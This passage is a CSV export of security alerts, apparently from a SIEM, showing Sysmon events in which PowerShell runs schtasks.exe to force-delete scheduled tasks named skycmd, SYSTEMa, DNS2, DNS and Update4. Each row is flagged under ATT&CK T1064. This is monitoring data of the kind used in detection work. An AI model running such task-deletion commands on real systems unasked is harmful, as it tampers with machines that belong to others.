Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.545",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.258 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001035ec1900} +ProcessId: 6452 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.261336500Z"",""eventRecordID"":""2239"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.258\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001035ec1900}\r\nProcessId: 6452\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" 
/Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.258"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001035ec1900}"",""processId"":""6452"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:18:05.480",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.233 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010a6ea1900} +ProcessId: 1948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.236294600Z"",""eventRecordID"":""2238"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.233\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010a6ea1900}\r\nProcessId: 1948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.233"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010a6ea1900}"",""processId"":""1948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.465",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.208 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001016e91900} +ProcessId: 4384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.211176700Z"",""eventRecordID"":""2237"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.208\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001016e91900}\r\nProcessId: 4384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.208"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001016e91900}"",""processId"":""4384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.436",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.147 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00107fe71900} +ProcessId: 3384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.150169400Z"",""eventRecordID"":""2236"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.147\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00107fe71900}\r\nProcessId: 3384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:37.147"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00107fe71900}"",""processId"":""3384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.422",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.103 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00109ce51900} +ProcessId: 1736 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium 
+Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.124187300Z"",""eventRecordID"":""2235"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.103\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00109ce51900}\r\nProcessId: 1736\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.103"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00109ce51900}"",""processId"":""1736"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.385",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.051 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010c3e31900} +ProcessId: 1772 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.084543400Z"",""eventRecordID"":""2234"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.051\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010c3e31900}\r\nProcessId: 1772\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.051"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010c3e31900}"",""processId"":""1772"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s 